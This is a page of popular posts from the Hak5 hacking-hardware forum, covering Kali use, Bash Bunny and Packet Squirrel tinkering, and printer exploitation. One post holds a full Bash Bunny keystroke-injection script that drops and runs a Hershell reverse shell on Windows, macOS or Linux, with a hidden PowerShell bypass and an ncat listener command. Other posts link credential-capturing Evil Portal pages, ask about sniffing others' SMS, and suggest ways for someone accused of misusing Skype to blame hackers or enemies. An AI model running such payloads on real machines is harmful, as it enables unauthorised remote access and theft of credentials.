Jump to content
Hak5 Forums


Popular Content

Showing content with the highest reputation since 03/23/2018 in all areas

  1. 2 points
    I used to run it as my daily driver. Just add a normal non-root user, and change the background. Unless someone sees it booting, they're not going to know it's kali. I changed by boot screen and login screens as well anyway. That's why they went with the Debian base, to be used as a main os. I'm running stock Debian now though, less shit starting up that I didn't really need.
  2. 1 point
    Please PM me if there any issues/improvements. Thanks! #!/bin/bash # Title: Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode) # Author: m3t4lk3y # Version: 0.5 # Target: Windows, Mac OSX, Linux # Creds: Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell # Instructions: # Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting) # 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe) # 2. Uncomment desired target OS payload lines and ensure others are commented out # 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343) # 4. Execute attack via Bash Bunny # SETUP DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny LED R GET SWITCH_POSITION # Gets switch position (e.g. switch2) ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial # Modified RUN helper function RUN() { local os=$1 shift [[ -z "$os" || -z "$*" ]] && exit 1 case "$os" in WIN) QUACK GUI m QUACK DELAY 500 QUACK GUI r QUACK DELAY 500 QUACK STRING cmd.exe QUACK DELAY 100 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER ;; OSX) QUACK GUI SPACE QUACK DELAY 100 QUACK STRING terminal QUACK DELAY 100 QUACK ENTER QUACK GUI t QUACK DELAY 100 QUACK STRING /bin/bash QUACK DELAY 100 QUACK ENTER QUACK STRING "$@" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER QUACK DELAY 100 QUACK STRING "exit" QUACK DELAY 100 QUACK ENTER ;; UNITY) QUACK ALT F2 QUACK DELAY 1000 QUACK STRING xterm QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING /bin/bash QUACK DELAY 1000 QUACK ENTER QUACK DELAY 500 QUACK STRING cd /media/'$USER' QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "$@" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 QUACK STRING "exit" QUACK DELAY 500 QUACK ENTER ;; *) exit 1 ;; esac } export -f RUN # START Attack LED Y # [+] Mac - Uncomment the following lines to use: # until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount # LED Y FAST # RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &" # [+] Linux - Uncomment the following lines to use: until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount LED Y FAST RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &" # [+] Windows - Uncomment the following lines to use: # until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount # LED Y FAST # RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')" # END sleep 5 LED G # shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)
  3. 1 point
    Hi. Im searching for sniffing any phones sms messaging. But I just find it is possibe with some phones (Samsung S5, S6, Note). Can I sniff any phones with RTL-SDR antenna & wireshark?
  4. 1 point
    I had Avira installed on my pc and it blocked the internet sharing
  5. 1 point
    https://github.com/j0te/bashbunny-payloads/tree/master/payloads/library/prank/FakeUpdate here you are
  6. 1 point
    I didn't expect you'd need it spelled out so simply, but ok. You sitting there, using a distribution of linux that is known for penetration testing. People see that and might go "Oh what is he doing? He shouldn't be there. Is he hacking into this establishment". Overall, as I said in the other topic, learn how your own computer and network works first before going around elsewhere.
  7. 1 point
    As I tend to say, learn how your computer works, then how a network works, then go from there. There is a free Kali Linux book available also at https://www.kali.org/download-kali-linux-revealed-book/ But you should set yourself goals. What do you want to learn, and then go about learning about it. There is no one trick that does it. No simple path. This is a journey of discovery and learning, it's long and arduous, but great fun too.
  8. 1 point
    my ebook on Amazon Kindle store is good for beginners. Good luck Kali Linux Handyman The ins and outs of Kali Linux Happy Hacking
  9. 1 point
    Should be good thats all use.
  10. 1 point
    Download metasploitable. Install on virtualbox. launch some exploits at this virtual machine to see what a success looks like
  11. 1 point
    Evil Portals A collection of portals that can be loaded into the Evil Portal module and can be used to capture credentials. Usage and more; https://kbeflo.github.io/evilportals I'd be happy to hear about issues, and suggestions. Feel free to ask anything, contribute new templates, and improve the project.
  12. 1 point
    Also, if it doesn't start right away, you can blow (on) it:
  13. 1 point
    Thanks team, I have been trying to get in more time to practice. You all gave very good answers to my question. This is why I choose Hak5 over the uhhhh competitors non-existant customer support. A Minipwner OG also reached out to me. So away I go practice practice practice. Thanks again. Peace.
  14. 1 point
    Message me in private (on the forum) I will give you some links to read, watch etc.
  15. 1 point
    I'm also wondering the same thing, I hope someone can chime in and clear it up for us both. Isn't there an Auto-Ethernet command now in firmware 1.5? - Added new AUTO_ETHERNET attackmode - This attackmode will first attempt to bring up ECM_ETHERNET. If after the default timeout of 20 seconds no connection is established, RNDIS_ETHERNET will be attempted. - In addition to AUTO_ETHERNET, ETHERNET_TIMEOUT_XX has been added. This sets the timeout to XX.
  16. 1 point
    I've messed with PRET in the past. It is all python. I would say if the dependencies are met (which I believe they are all in python core) then it should work if PS has same dependencies in its core. You could make it an ssh console but it being python you could look through the main module to see how it uses its sub modules and incorporate that into your own interface to use. Hey @Dave-ee Jones , why don't you see how this can be incorporated as a module into that Wrt web interface you made? Would be great as a starter module to get a feel on how users can create their own modules for your system if you are going that way. :-)
  17. 1 point
    Since getting a PacketSquirrel and learning that it would be great to drop behind amongst other things printers it got me thinking. The PacketSquirrel already has some solid tools installed as default but figured PRET (Printer Exploitation Toolkit) would be a nice addition. Info on PRET https://github.com/RUB-NDS/PRET Recent Blackhat presentation https://www.blackhat.com/docs/us-17/thursday/us-17-Mueller-Exploiting-Network-Printers.pdf Other printer attack info http://hacking-printers.net/wiki/index.php/Main_Page known vulnerable printer databases here https://github.com/RUB-NDS/PRET/tree/master/db Mine wasn't in the db but worked with pcl so I'm sure others will work also. After some challenges squeezing it onto the PocketSquirrel without going full extroot I think I figured it out on the default squirrel build. I tried adding /mnt as a opkg destination and using links and then pip etc... but in the end manual install of python modules seems to have the lowest footprint. After install still leaving the PacketSquirrel with 55% of unused rootfs . I'm not 100% sure if this can be "payloaded" but at least for remote SSH access its a nice tool to have. My problem now is the printer I borrowed uses PCL and that in itself is quite restrictive in what can be done with PRET, so im kinda out of my testing limit and need other targets to test against so I'm sharing it here for others to try. The install method I used in the end was to plug my USB drive into my laptop and git cloned each of the following to the drive. https://github.com/RUB-NDS/PRET https://github.com/etingof/pysnmp https://github.com/etingof/pysmi https://github.com/etingof/pyasn1 https://github.com/tartley/colorama Once cloned unplug safely and replug back into your squirrel. Then EXCLUDING PRET, go into each dir and use python to install the modules "python setup.py install' afterwards you should then be able to run PRET and use its tools from the squirrel directly.
  18. 1 point
    guys should I update? - the number of users saying that something is not working is concerning.... what is the current status? thanks!
  19. 1 point
    Put SSID filtering and Client filtering both to deny mode (without putting anything inside)
  20. 1 point
    That's on;y needed for the keys stored in the /root/.ssh folder though. I was able to take a Squirrel out of the box, use ssh-copy-id to copy my keys, and SSH in without changing any permissions. Currently you can use AutoSSH, but we are replacing that with SSHTunnel in firmware 1.1.
  21. 1 point
    I dont have the original one just my modified version from PyDuckGen: Click
  22. 1 point
    You could help in providing mind bottling theories to solving this question... how do you get shells... The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video. If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.
  23. 1 point
    Could mod it to have 11 radios. Would be kind of costly tho.. Might just have to do it for the fun of it!
  24. 1 point
    Here are a few more pics. Currently working on a more compact enclosure, roughly a third smaller. Some improvements with the smaller enclosure will be custom USB cables, possibly removal of the cooling fan (testing if it is actually needed), and as mentioned before a built in battery pack. The current setup was mainly done for testing but seems to be very functional. The only piece not seen in the pictures is the GPS unit which is mounted to the lid of the enclosure. Any suggestions for improvements or general thoughts on the build would be appreciated!
  25. 1 point
    If done correctly i guess a hack can't be traced technically. So try to disprove the evidence. 1) Maybe you can prove you weren't near your laptop at the time of one of these skype incidents. 2) If there are skype recordings maybe they can work in your favor. 3) If your password was weak at the time (several old password may still be in the system), you can claim someone else hacked your account. 4) Maybe you have obvious enemies and if they had motive/means/opportunity, you can claim they did this .. 5) Etc .. Also it may be a good thing to lawyer up depending on how serious the situation is.